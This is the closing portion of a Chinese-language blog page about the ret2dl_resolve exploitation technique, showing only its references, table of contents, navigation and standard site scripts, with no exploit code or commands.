<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p>[1] 《程序员的自我修养——链接、装载与库》 7.4节</p>
<p>[2] <a href="https://wiki.x10sec.org/pwn/stackoverflow/advanced_rop/" target="_blank" rel="noopener">https://wiki.x10sec.org/pwn/stackoverflow/advanced_rop/</a></p>
	  
	</div>

	<div>
  	<center>
	<div class="pagination">

    
    
    <a type="button" class="btn btn-default disabled"><i class="fa fa-arrow-circle-o-left"></i>Prev</a>
    

    <a href="/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="/2020/04/01/flag/" type="button" class="btn btn-default ">Next<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>

    </center>
	</div>
	
	<!-- comment -->
	
<section id="comment">
    <h2 class="title">Comments</h2>

    
</section>


	</div> <!-- col-md-9/col-md-12 -->
		
	
	<div id="side_meta">
		<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2020-04-01 
	</div>
	

	<!-- categories -->
    
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#categorys"><i class="fa fa-folder"></i></a>	
    <ul id="categorys" class="tag_box list-unstyled collapse in">
          
  <li>
    <li><a href="/categories/pwn/">pwn<span>1</span></a></li>
  </li>

    </ul>
	</div>
	

	<!-- tags -->
	
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#tags"><i class="fa fa-tags"></i></a>		  
    <ul id="tags" class="tag_box list-unstyled collapse in">	  
	    
  <li><a href="/tags/libc/">libc<span>1</span></a></li> <li><a href="/tags/ret2dl-resolve/">ret2dl_resolve<span>1</span></a></li>
    </ul>
	</div>
		

	<!-- toc -->
	<div class="meta-widget">
	
	   <a data-toggle="collapse" data-target="#toc"><i class="fa fa-bars"></i></a>
	   <div id="toc" class="toc collapse in">
		   <span class="toc-title">Contents</span>
			<ol class="toc-article"><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#前言"><span class="toc-article-text">前言</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#前置知识"><span class="toc-article-text">前置知识</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#漏洞利用方法"><span class="toc-article-text">漏洞利用方法</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#漏洞利用实例"><span class="toc-article-text">漏洞利用实例</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#在一个地址上写入”system”"><span class="toc-article-text">在一个地址上写入”system”</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#伪造reloc"><span class="toc-article-text">伪造reloc</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#调用dl-runtime-resolve"><span class="toc-article-text">调用dl_runtime_resolve()</span></a></li></ol></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#注意事项"><span class="toc-article-text">注意事项</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#写在最后"><span class="toc-article-text">写在最后</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#参考"><span class="toc-article-text">参考</span></a></li></ol>
		</div>
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->

	</div>
		

</div><!-- row -->



	</div>
  </div>
  <div class="container-narrow">
  <footer>  </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/bootstrap.min.js"></script>
<script src="/js/main.js"></script>
<script src="/js/search.js"></script> 


<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>



   <script type="text/javascript">      
     var search_path = "search.xml";
	 if (search_path.length == 0) {
	 	search_path = "search.xml";
	 }
	 var path = "/" + search_path;
     searchFunc(path, 'local-search-input', 'local-search-result');
   </script>

</body>
   </html>
